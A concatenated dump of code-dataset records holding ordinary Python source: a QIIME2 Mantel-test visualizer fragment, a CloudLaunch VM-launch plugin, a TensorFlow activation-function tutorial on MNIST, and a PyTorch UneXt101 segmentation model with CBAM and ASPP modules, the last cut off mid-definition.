dm2.filter(matched_ids, strict=True)\n\n # Run in `strict` mode because all IDs should be matched at this point.\n r, p, sample_size = skbio.stats.distance.mantel(\n dm1, dm2, method=method, permutations=permutations,\n alternative=alt_hypothesis, strict=True)\n\n result = pd.Series([method.title(), sample_size, permutations,\n alt_hypothesis, r, p],\n index=['Method', 'Sample size', 'Permutations',\n 'Alternative hypothesis',\n '%s %s' % (method.title(),\n test_statistics[method]),\n 'p-value'],\n name='Mantel test results')\n table_html = q2templates.df_to_html(result.to_frame())\n\n # We know the distance matrices have matching ID sets at this point, so we\n # can safely generate all pairs of IDs using one of the matrices' ID sets\n # (it doesn't matter which one).\n scatter_data = []\n for id1, id2 in itertools.combinations(dm1.ids, 2):\n scatter_data.append((dm1[id1, id2], dm2[id1, id2]))\n\n plt.figure()\n x = 'Pairwise Distance (%s)' % label1\n y = 'Pairwise Distance (%s)' % label2\n scatter_data = pd.DataFrame(scatter_data, columns=[x, y])\n sns.regplot(x=x, y=y, data=scatter_data, fit_reg=False)\n plt.savefig(os.path.join(output_dir, 'mantel-scatter.svg'))\n\n context = {\n 'table': table_html,\n 'sample_size': sample_size,\n 'mismatched_ids': mismatched_ids\n }\n index = os.path.join(\n TEMPLATES, 'mantel_assets', 'index.html')\n q2templates.render(index, output_dir, context=context)\n","sub_path":"q2_diversity/_beta/_visualizer.py","file_name":"_visualizer.py","file_ext":"py","file_size_in_byte":14564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521218982","text":"\"\"\"Base VM plugin implementations.\"\"\"\nimport copy\nimport time\nimport yaml\n\nfrom cloudbridge.cloud.interfaces.resources import TrafficDirection\nimport requests\nimport requests.exceptions\n\nfrom djcloudbridge import domain_model\nfrom .app_plugin import AppPlugin\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass BaseVMAppPlugin(AppPlugin):\n \"\"\"\n Implementation for the basic VM app.\n\n It is expected that other apps inherit this class and override or\n complement methods provided here.\n \"\"\"\n\n def __init__(self):\n \"\"\"Init any base app vars.\"\"\"\n self.base_app = True\n\n @staticmethod\n def process_app_config(provider, name, cloud_config, app_config):\n \"\"\"Extract any extra user data from the app config and return it.\"\"\"\n return app_config.get(\"config_cloudlaunch\", {}).get(\n \"instance_user_data\", {})\n\n @staticmethod\n def sanitise_app_config(app_config):\n \"\"\"Return a sanitized copy of the supplied app config object.\"\"\"\n return copy.deepcopy(app_config)\n\n def _get_or_create_kp(self, provider, kp_name):\n \"\"\"Get or create an SSH key pair with the supplied name.\"\"\"\n kps = provider.security.key_pairs.find(name=kp_name)\n if kps:\n return kps[0]\n else:\n log.debug(\"Creating key pair {0}\".format(kp_name))\n return provider.security.key_pairs.create(name=kp_name)\n\n def _get_or_create_vmf(self, provider, subnet_id, vmf_name, description):\n \"\"\"Fetch an existing VM firewall named ``vmf_name`` or create one.\"\"\"\n vmf = provider.security.vm_firewalls.find(name=vmf_name)\n if len(vmf) > 0:\n return vmf[0]\n subnet = provider.networking.subnets.get(subnet_id)\n return provider.security.vm_firewalls.create(\n name=vmf_name, description=description,\n network_id=subnet.network_id)\n\n def _get_cb_launch_config(self, provider, image, cloudlaunch_config):\n \"\"\"Compose a CloudBridge launch config object.\"\"\"\n lc = None\n if cloudlaunch_config.get(\"rootStorageType\", \"instance\") == \"volume\":\n if not lc:\n lc = provider.compute.instances.create_launch_config()\n lc.add_volume_device(source=image,\n size=int(cloudlaunch_config.get(\n \"rootStorageSize\", 20)),\n is_root=True)\n return lc\n\n def wait_for_http(self, url, max_retries=200, poll_interval=5):\n \"\"\"Wait till app is responding at http URL.\"\"\"\n count = 0\n while count < max_retries:\n time.sleep(poll_interval)\n try:\n r = requests.head(url)\n r.raise_for_status()\n return\n except requests.exceptions.HTTPError as e:\n if e.response.status_code in (401, 403):\n return\n except requests.exceptions.ConnectionError:\n pass\n count += 1\n\n def attach_public_ip(self, provider, inst):\n \"\"\"\n If instance has no public IP, try to attach one.\n\n The method will attach a random floating IP that's available in the\n account. If there are no available IPs, try to allocate a new one.\n\n :rtype: ``str``\n :return: The attached IP address. This can be one that's already\n available on the instance or one that has been attached.\n \"\"\"\n if not inst.public_ips:\n fip = None\n for ip in provider.networking.floating_ips:\n if not ip.in_use:\n fip = ip\n break\n if fip:\n log.debug(\"Attaching an existing floating IP %s\" %\n fip.public_ip)\n inst.add_floating_ip(fip)\n else:\n fip = provider.networking.floating_ips.create()\n log.debug(\"Attaching a just-created floating IP %s\" %\n fip.public_ip)\n inst.add_floating_ip(fip)\n return fip.public_ip\n elif len(inst.public_ips) > 0:\n return inst.public_ips[0]\n else:\n return None\n\n def configure_vm_firewalls(self, provider, subnet_id, firewall):\n \"\"\"\n Ensure any supplied firewall rules are represented in a VM Firewall.\n\n The following format is expected:\n\n ```\n \"firewall\": [\n {\n \"rules\": [\n {\n \"from\": \"22\",\n \"to\": \"22\",\n \"cidr\": \"0.0.0.0/0\",\n \"protocol\": \"tcp\"\n },\n {\n \"src_group\": \"MyApp\",\n \"from\": \"1\",\n \"to\": \"65535\",\n \"protocol\": \"tcp\"\n },\n {\n \"src_group\": 'bd9756b8-e9ab-41b1-8a1b-e466a04a997c',\n \"from\": \"22\",\n \"to\": \"22\",\n \"protocol\": \"tcp\"\n }\n ],\n \"securityGroup\": \"MyApp\",\n \"description\": \"My App SG\"\n }\n ]\n ```\n\n Note that if ``src_group`` is supplied, it must be either the current\n security group name or an ID of a different security group for which\n a rule should be added (i.e., different security groups cannot be\n identified by name and their ID must be used).\n\n :rtype: List of CloudBridge SecurityGroup\n :return: Security groups satisfying the constraints.\n \"\"\"\n vmfl = []\n for group in firewall:\n # Get a handle on the SG\n vmf_name = group.get('securityGroup') or 'CloudLaunchDefault'\n vmf_desc = group.get('description') or 'Created by CloudLaunch'\n vmf = self._get_or_create_vmf(\n provider, subnet_id, vmf_name, vmf_desc)\n vmfl.append(vmf)\n # Apply firewall rules\n for rule in group.get('rules', []):\n try:\n if rule.get('src_group'):\n vmf.rules.create(TrafficDirection.INBOUND,\n rule.get('protocol'),\n int(rule.get('from_port')),\n int(rule.get('to_port')),\n src_dest_fw=vmf)\n else:\n vmf.rules.create(TrafficDirection.INBOUND,\n protocol=rule.get('protocol'),\n from_port=int(rule.get('from')),\n to_port=int(rule.get('to')),\n cidr=rule.get('cidr'))\n except Exception as e:\n log.error(\"Exception applying firewall rules: %s\" % e)\n return vmfl\n\n def get_or_create_subnet(self, provider, net_id=None, placement=None):\n \"\"\"\n Figure out a subnet matching the supplied constraints.\n\n Any combination of the optional parameters is accepted.\n \"\"\"\n if net_id:\n net = provider.networking.networks.get(net_id)\n for sn in net.subnets():\n # No placement necessary; pick a (random) subnet\n if not placement:\n return sn\n # Placement match is necessary\n elif sn.zone == placement:\n return sn\n sn = provider.networking.subnets.get_or_create_default(placement)\n return sn.id if sn else None\n\n def resolve_launch_properties(self, provider, cloudlaunch_config):\n \"\"\"\n Resolve inter-dependent launch properties.\n\n Subnet, Placement, and VM Firewalls have launch dependencies among\n themselves so deduce what does are.\n \"\"\"\n net_id = cloudlaunch_config.get('network', None)\n subnet_id = cloudlaunch_config.get('subnet', None)\n placement = cloudlaunch_config.get('placementZone', None)\n if not subnet_id:\n subnet_id = self.get_or_create_subnet(provider, net_id, placement)\n vmf = None\n if cloudlaunch_config.get('firewall', []):\n vmf = self.configure_vm_firewalls(\n provider, subnet_id, cloudlaunch_config.get('firewall', []))\n return subnet_id, placement, vmf\n\n def launch_app(self, provider, task, name, cloud_config,\n app_config, user_data):\n \"\"\"Initiate the app launch process.\"\"\"\n cloudlaunch_config = app_config.get(\"config_cloudlaunch\", {})\n custom_image_id = cloudlaunch_config.get(\"customImageID\", None)\n img = provider.compute.images.get(\n custom_image_id or cloud_config.get('image_id'))\n task.update_state(state='PROGRESSING',\n meta={'action': \"Retrieving or creating a key pair\"})\n kp = self._get_or_create_kp(provider,\n cloudlaunch_config.get('keyPair') or\n 'cloudlaunch_key_pair')\n task.update_state(state='PROGRESSING',\n meta={'action': \"Applying firewall settings\"})\n subnet_id, placement_zone, vmfl = self.resolve_launch_properties(\n provider, cloudlaunch_config)\n cb_launch_config = self._get_cb_launch_config(provider, img,\n cloudlaunch_config)\n vm_type = cloudlaunch_config.get(\n 'instanceType', cloud_config.get('default_instance_type'))\n\n log.debug(\"Launching with subnet %s and VM firewalls %s\" %\n (subnet_id, vmfl))\n log.info(\"Launching base_vm with UD:\\n%s\" % user_data)\n task.update_state(state='PROGRESSING',\n meta={'action': \"Launching an instance of type %s \"\n \"with keypair %s in zone %s\" %\n (vm_type, kp.name, placement_zone)})\n inst = provider.compute.instances.create(\n name=name, image=img, vm_type=vm_type, subnet=subnet_id,\n key_pair=kp, vm_firewalls=vmfl, zone=placement_zone,\n user_data=user_data, launch_config=cb_launch_config)\n task.update_state(state='PROGRESSING',\n meta={'action': \"Waiting for instance %s\" % inst.id})\n log.debug(\"Waiting for instance {0} to be ready...\".format(inst.id))\n inst.wait_till_ready()\n static_ip = cloudlaunch_config.get('staticIP')\n if static_ip:\n task.update_state(state='PROGRESSING',\n meta={'action': \"Assigning requested floating \"\n \"IP: %s\" % static_ip})\n inst.add_floating_ip(static_ip)\n inst.refresh()\n results = {}\n results['keyPair'] = {'id': kp.id, 'name': kp.name,\n 'material': kp.material}\n # FIXME: this does not account for multiple VM fw and expects one\n results['securityGroup'] = {'id': vmfl[0].id, 'name': vmfl[0].name}\n results['instance'] = {'id': inst.id}\n results['publicIP'] = self.attach_public_ip(provider, inst)\n task.update_state(\n state='PROGRESSING',\n meta={\"action\": \"Instance created successfully. \" +\n \"Public IP: %s\" % results['publicIP'] if results['publicIP']\n else \"\"})\n if self.base_app:\n if results['publicIP']:\n results['applicationURL'] = 'http://%s/' % results['publicIP']\n task.update_state(\n state='PROGRESSING',\n meta={'action': \"Waiting for application to become ready \"\n \"at %s\" % results['applicationURL']})\n self.wait_for_http(results['applicationURL'])\n else:\n results['applicationURL'] = 'N/A'\n return {\"cloudLaunch\": results}\n\n def _get_deployment_iid(self, deployment):\n \"\"\"\n Extract instance ID for the supplied deployment.\n\n We extract instance ID only for deployments in the SUCCESS state.\n\n @type deployment: ``dict``\n @param deployment: A dictionary describing an instance of the\n app deployment, requiring at least the following\n keys: ``launch_status``, ``launch_result``.\n\n :rtype: ``str``\n :return: Provider-specific instance ID for the deployment or\n ``None`` if instance ID not available.\n \"\"\"\n if deployment.get('launch_status') == 'SUCCESS':\n return deployment.get('launch_result', {}).get(\n 'cloudLaunch', {}).get('instance', {}).get('id')\n else:\n return None\n\n def health_check(self, provider, deployment):\n \"\"\"Check the health of this app.\"\"\"\n log.debug(\"Health check for deployment %s\", deployment)\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return {\"instance_status\": \"unknown\"}\n log.debug(\"Checking the status of instance %s\", iid)\n inst = provider.compute.instances.get(iid)\n if inst:\n return {\"instance_status\": inst.state}\n else:\n return {\"instance_status\": \"deleted\"}\n\n def restart(self, provider, deployment):\n \"\"\"Restart the app associated with the supplied deployment.\"\"\"\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return False\n log.debug(\"Restarting deployment instance %s\", iid)\n inst = provider.compute.instances.get(iid)\n if inst:\n inst.reboot()\n return True\n # Instance does not exist so default to False\n return False\n\n def delete(self, provider, deployment):\n \"\"\"\n Delete resource(s) associated with the supplied deployment.\n\n *Note* that this method will delete resource(s) associated with\n the deployment - this is an un-recoverable action.\n \"\"\"\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return False\n log.debug(\"Deleting deployment instance %s\", iid)\n inst = provider.compute.instances.get(iid)\n if inst:\n inst.delete()\n return True\n # Instance does not exist so default to True\n return True\n","sub_path":"django-cloudlaunch/baselaunch/backend_plugins/base_vm_app.py","file_name":"base_vm_app.py","file_ext":"py","file_size_in_byte":14593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607040207","text":"\"\"\"\nExplore multiple ways to address exploding gradients\nand vanishing gradients during training\n\"\"\"\n\n# Common Imports\nfrom datetime import datetime\nimport numpy as np\nimport os\n\n# Data Science Imports\nimport tensorflow as tf\n\n# Graph Imports\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n# Config\nPROJECT_ROOT_DIR = \".\"\nnow = datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\nroot_logdir = \"tf_logs\"\nlogdir = \"{}/run-{}/\".format(root_logdir, now)\n\n# Declare Functions\n\n\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n\ndef save_fig(fig_id, tight_layout=True):\n if not os.path.exists('images'):\n os.makedirs('images')\n path = os.path.join(PROJECT_ROOT_DIR, \"images\", fig_id + \".png\")\n print(\"Saving\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=r'png', dpi=300)\n\n\ndef shuffle_batch(X, y, batch_size):\n rnd_idx = np.random.permutation(len(X))\n n_batches = len(X) // batch_size\n for batch_idx in np.array_split(rnd_idx, n_batches):\n X_batch, y_batch = X[batch_idx], y[batch_idx]\n yield X_batch, y_batch\n\n\ndef logit(z):\n \"\"\" Sigmoid Function \"\"\"\n return 1 / (1 + np.exp(-z))\n\n\ndef leaky_relu(z, alpha=0.01):\n return np.maximum(alpha * z, z)\n\n\ndef leaky_relu_tf(z, name=None):\n return tf.maximum(0.01 * z, z, name=name)\n\n\ndef elu(z, alpha=1):\n \"\"\"Exponential linear unit activation function\"\"\"\n return np.where(z < 0, alpha * (np.exp(z) - 1), z)\n\n\ndef selu(z,\n scale=1.0507009873554804934193349852946,\n alpha=1.6732632423543772848170429916717):\n \"\"\"scaled exponential linear unit function\"\"\"\n return scale * elu(z, alpha)\n\n\ndef selu_tf(z,\n scale=1.0507009873554804934193349852946,\n alpha=1.6732632423543772848170429916717):\n return scale * tf.where(z >= 0.0, z, alpha * tf.nn.elu(z))\n\n\n# Create Datasets\n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.mnist.load_data()\nX_train = X_train.astype(np.float32).reshape(-1, 28 * 28) / 255.0\nX_test = X_test.astype(np.float32).reshape(-1, 28 * 28) / 255.0\ny_train = y_train.astype(np.int32)\ny_test = y_test.astype(np.int32)\nX_valid, X_train = X_train[:5000], X_train[5000:]\ny_valid, y_train = y_train[:5000], y_train[5000:]\n\n# Plots\n\nz = np.linspace(-5, 5, 200)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [1, 1], 'k--')\nplt.plot([0, 0], [-0.2, 1.2], 'k-')\nplt.plot(z, logit(z), \"b-\", linewidth=2)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate(\n \"Saturating\",\n xytext=(3.5, 0.7),\n xy=(5, 1),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.annotate(\n \"Saturating\",\n xytext=(-3.5, 0.3),\n xy=(-5, 0),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.annotate(\n \"Linear\",\n xytext=(2, 0.2),\n xy=(0, 0.5),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.grid(True)\nplt.title(\"Sigmoid activation function\", fontsize=14)\nplt.axis([-5, 5, -0.2, 1.2])\n\nsave_fig(\"sigmoid_saturation_plot\")\nplt.show()\n\n# Xavier and He Initialization\nn_inputs = 28 * 28\nn_hidden1 = 300\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\n\nhe_init = tf.variance_scaling_initializer()\nhidden1 = tf.layers.dense(\n X,\n n_hidden1,\n activation=tf.nn.relu,\n kernel_initializer=he_init,\n name=\"hidden1\")\n\n# Nonsaturating Activating Functions\n# Leaky ReLU\n\nreset_graph()\n\nplt.plot(z, leaky_relu(z, 0.05), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-0.5, 4.2], 'k-')\nplt.grid(True)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate(\n 'Leak', xytext=(-3.5, 0.5), xy=(-5, -0.2), arrowprops=props, fontsize=14)\nplt.title(\"Leaky ReLU activation function\", fontsize=14)\nplt.axis([-5, 5, -0.5, 4.2])\n\nsave_fig(\"leaky_relu_plot\")\nplt.show()\n\n# Leaky ReLU in tensorflow\nreset_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\nhidden1 = tf.layers.dense(\n X, n_hidden1, activation=leaky_relu_tf, name=\"hidden1\")\n\nreset_graph()\n\n# NN Hyperparameters\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\n# Training hyperparameters\nlearning_rate = 0.01\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\ny = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\nwith tf.name_scope(\"dnn\"):\n hidden1 = tf.layers.dense(\n X, n_hidden1, activation=leaky_relu_tf, name=\"hidden1\")\n hidden2 = tf.layers.dense(\n hidden1, n_hidden2, activation=leaky_relu_tf, name=\"hidden2\")\n logits = tf.layers.dense(hidden2, n_outputs, name=\"outputs\")\n\nwith tf.name_scope(\"loss\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name=\"loss\")\n\nwith tf.name_scope(\"train\"):\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\nwith tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n acc_summary = tf.summary.scalar('accuracy', accuracy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nfile_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\n\n# Iteration parameters\nn_epochs = 40\nbatch_size = 50\n\n# For easily collecting and resing model operations\nfor op in (X, y, accuracy, training_op):\n tf.add_to_collection(\"my_important_ops\", op)\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for X_batch, y_batch in shuffle_batch(X_train, y_train, batch_size):\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n if epoch % 5 == 0:\n summary_str = acc_summary.eval(feed_dict={X: X_batch, y: y_batch})\n step = epoch * len(X_batch)\n file_writer.add_summary(summary_str, step)\n acc_batch = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n acc_valid = accuracy.eval(feed_dict={X: X_valid, y: y_valid})\n print(epoch, \"Batch accuracy:\", acc_batch, \"Validation accuracy:\",\n acc_valid)\n\n save_path = saver.save(sess, \"./tf_mnist_model_final.ckpt\")\n\n# Exponential Linear Unit\nplt.plot(z, elu(z), 'b-', linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1, -1], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"ELU activation function ($\\alpha=1$)\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"elu_plot\")\nplt.show()\n\n# Implementing ELU in TensorFlow by specifying the activation function\nreset_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\nhidden1 = tf.layers.dense(X, n_hidden1, activation=tf.nn.elu, name=\"hidden1\")\n\n# SELU & SNN, Scaled Exponential Linear Units, Self Normalizing Networks\nplt.plot(z, selu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"SELU activation function\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"selu_plot\")\nplt.show()\n\n# Neural Net for MNIST using the SELU activation function\nreset_graph()\n\n# Network Hyperparameters\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\n# Training Hyperparameters\nlearning_rate = 0.01\n\n# Optimizer hyperparameters\nn_epoch = 40\nbatch_size = 50\n\n# Graph nodes, tensors for X and y\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\ny = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\n# Node for the dnn tensor\nwith tf.name_scope(\"dnn\"):\n hidden1 = tf.layers.dense(X, n_hidden1, activation=selu_tf, name=\"hidden1\")\n hidden2 = tf.layers.dense(\n hidden1, n_hidden2, activation=selu_tf, name=\"hidden2\")\n logits = tf.layers.dense(hidden2, n_outputs, name=\"outputs\")\n\nwith tf.name_scope(\"loss\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name=\"loss\")\n\nwith tf.name_scope(\"train\"):\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\nwith tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\n# Graph initalizer and saving\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\n# Scale inputs\nmeans = X_train.mean(axis=0, keepdims=True)\nstds = X_train.std(axis=0, keepdims=True) + 1e-10\nX_val_scaled = (X_valid - means) / stds\n\n# For easily collecting and resing model operations\nfor op in (X, y, accuracy, training_op):\n tf.add_to_collection(\"my_important_ops\", op)\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for X_batch, y_batch in shuffle_batch(X_train, y_train, batch_size):\n X_batch_scaled = (X_batch - means) / stds\n sess.run(training_op, feed_dict={X: X_batch_scaled, y: y_batch})\n if epoch % 5 == 0:\n acc_batch = accuracy.eval(feed_dict={\n X: X_batch_scaled,\n y: y_batch\n })\n acc_valid = accuracy.eval(feed_dict={X: X_val_scaled, y: y_valid})\n print(epoch, \"Batch accuracy\", acc_batch, \"Validation accuracy\",\n acc_valid)\n\n save_path = saver.save(sess, \"./tf_model_final_selu.ckpt\")\n","sub_path":"tensorflow_deeplearning/training_deep_neural_networks/norm_reg_optimization/vanishing_exploding_gradients.py","file_name":"vanishing_exploding_gradients.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200284132","text":"import torch.nn as nn\nimport torch.tensor as Tensor\nimport torch\nimport torch.nn.functional as F\nfrom fastai.vision.all import *\n\n\nclass CBAM(nn.Module):\n def __init__(self, n_channels_in, reduction_ratio, kernel_size):\n super(CBAM, self).__init__()\n self.n_channels_in = n_channels_in\n self.reduction_ratio = reduction_ratio\n self.kernel_size = kernel_size\n\n self.channel_attention = ChannelAttention(n_channels_in, reduction_ratio)\n self.spatial_attention = SpatialAttention(kernel_size)\n\n def forward(self, f):\n chan_att = self.channel_attention(f)\n # print(chan_att.size())\n fp = chan_att * f\n # print(fp.size())\n spat_att = self.spatial_attention(fp)\n # print(spat_att.size())\n fpp = spat_att * fp\n # print(fpp.size())\n return fpp\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size):\n super(SpatialAttention, self).__init__()\n self.kernel_size = kernel_size\n\n assert kernel_size % 2 == 1, \"Odd kernel size required\"\n self.conv = nn.Conv2d(in_channels = 2, out_channels = 1, kernel_size = kernel_size, padding= int((kernel_size-1)/2))\n # batchnorm\n\n def forward(self, x):\n max_pool = self.agg_channel(x, \"max\")\n avg_pool = self.agg_channel(x, \"avg\")\n pool = torch.cat([max_pool, avg_pool], dim = 1)\n conv = self.conv(pool)\n # batchnorm\n conv = conv.repeat(1,x.size()[1],1,1)\n att = torch.sigmoid(conv)\n return att\n\n def agg_channel(self, x, pool = \"max\"):\n b,c,h,w = x.size()\n x = x.view(b, c, h*w)\n x = x.permute(0,2,1)\n if pool == \"max\":\n x = F.max_pool1d(x,c)\n elif pool == \"avg\":\n x = F.avg_pool1d(x,c)\n x = x.permute(0,2,1)\n x = x.view(b,1,h,w)\n return x\n\nclass ChannelAttention(nn.Module):\n def __init__(self, n_channels_in, reduction_ratio):\n super(ChannelAttention, self).__init__()\n self.n_channels_in = n_channels_in\n self.reduction_ratio = reduction_ratio\n self.middle_layer_size = int(self.n_channels_in/ float(self.reduction_ratio))\n\n self.bottleneck = nn.Sequential(\n nn.Linear(self.n_channels_in, self.middle_layer_size),\n nn.ReLU(),\n nn.Linear(self.middle_layer_size, self.n_channels_in)\n )\n\n\n def forward(self, x):\n kernel = (x.size()[2], x.size()[3])\n avg_pool = F.avg_pool2d(x, kernel )\n max_pool = F.max_pool2d(x, kernel)\n\n\n avg_pool = avg_pool.view(avg_pool.size()[0], -1)\n max_pool = max_pool.view(max_pool.size()[0], -1)\n\n avg_pool_bck = self.bottleneck(avg_pool)\n max_pool_bck = self.bottleneck(max_pool)\n\n pool_sum = avg_pool_bck + max_pool_bck\n\n sig_pool = torch.sigmoid(pool_sum)\n sig_pool = sig_pool.unsqueeze(2).unsqueeze(3)\n\n out = sig_pool.repeat(1,1,kernel[0], kernel[1])\n return out\n\nclass FPN(nn.Module):\n def __init__(self, input_channels:list, output_channels:list):\n super().__init__()\n self.convs = nn.ModuleList(\n [nn.Sequential(nn.Conv2d(in_ch, out_ch*2, kernel_size=3, padding=1),\n nn.ReLU(inplace=True), nn.BatchNorm2d(out_ch*2),\n nn.Conv2d(out_ch*2, out_ch, kernel_size=3, padding=1))\n for in_ch, out_ch in zip(input_channels, output_channels)])\n\n def forward(self, xs:list, last_layer):\n hcs = [F.interpolate(c(x),scale_factor=2**(len(self.convs)-i),mode='bilinear', align_corners=False)\n for i,(c,x) in enumerate(zip(self.convs, xs))]\n hcs.append(last_layer)\n return torch.cat(hcs, dim=1)\n\nclass UnetBlock(nn.Module):\n def __init__(self, up_in_c:int, x_in_c:int, nf:int=None, blur:bool=False,\n self_attention:bool=False, **kwargs):\n super().__init__()\n self.shuf = PixelShuffle_ICNR(up_in_c, up_in_c//2, blur=blur, **kwargs)\n self.bn = nn.BatchNorm2d(x_in_c)\n ni = up_in_c//2 + x_in_c\n nf = nf if nf is not None else max(up_in_c//2,32)\n self.conv1 = ConvLayer(ni, nf, norm_type=None, **kwargs)\n self.conv2 = ConvLayer(nf, nf, norm_type=None,\n xtra=SelfAttention(nf) if self_attention else None, **kwargs)\n self.relu = nn.ReLU(inplace=True)\n self.cbam = CBAM(n_channels_in = nf, reduction_ratio = 16, kernel_size = 3)\n\n def forward(self, up_in:Tensor, left_in:Tensor) -> Tensor:\n s = left_in\n up_out = self.shuf(up_in)\n cat_x = self.relu(torch.cat([up_out, self.bn(s)], dim=1))\n x = self.conv1(cat_x)\n x = self.cbam(x)\n return self.conv2(x)\n\nclass _ASPPModule(nn.Module):\n def __init__(self, inplanes, planes, kernel_size, padding, dilation, groups=1):\n super().__init__()\n self.atrous_conv = nn.Conv2d(inplanes, planes, kernel_size=kernel_size,\n stride=1, padding=padding, dilation=dilation, bias=False, groups=groups)\n self.bn = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU()\n\n self._init_weight()\n\n def forward(self, x):\n x = self.atrous_conv(x)\n x = self.bn(x)\n\n return self.relu(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\nclass ASPP(nn.Module):\n def __init__(self, inplanes=512, mid_c=256, dilations=[6, 12, 18, 24], out_c=None):\n super().__init__()\n self.aspps = [_ASPPModule(inplanes, mid_c, 1, padding=0, dilation=1)] + \\\n [_ASPPModule(inplanes, mid_c, 3, padding=d, dilation=d,groups=4) for d in dilations]\n self.aspps = nn.ModuleList(self.aspps)\n self.global_pool = nn.Sequential(nn.AdaptiveMaxPool2d((1, 1)),\n nn.Conv2d(inplanes, mid_c, 1, stride=1, bias=False),\n nn.BatchNorm2d(mid_c), nn.ReLU())\n out_c = out_c if out_c is not None else mid_c\n self.out_conv = nn.Sequential(nn.Conv2d(mid_c*(2+len(dilations)), out_c, 1, bias=False),\n nn.BatchNorm2d(out_c), nn.ReLU(inplace=True))\n self.conv1 = nn.Conv2d(mid_c*(2+len(dilations)), out_c, 1, bias=False)\n self._init_weight()\n\n def forward(self, x):\n x0 = self.global_pool(x)\n xs = [aspp(x) for aspp in self.aspps]\n x0 = F.interpolate(x0, size=xs[0].size()[2:], mode='bilinear', align_corners=True)\n x = torch.cat([x0] + xs, dim=1)\n return self.out_conv(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\nfrom torchvision.models.resnet import ResNet, Bottleneck\nclass UneXt101(nn.Module):\n# class UneXt50(nn.Module):\n def __init__(self, stride=1, **kwargs):\n super().__init__()\n #encoder\n # m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=4)\n # m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n # 'resnext50_32x4d_swsl')\n m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=8)\n m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n 'resnext101_32x8d_ssl')\n self.enc0 = nn.Sequential(m.conv1, m.bn1, nn.ReLU(inplace=True))\n self.enc1 = nn.Sequential(nn.MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1),\n m.layer1) #256\n self.enc2 = m.layer2 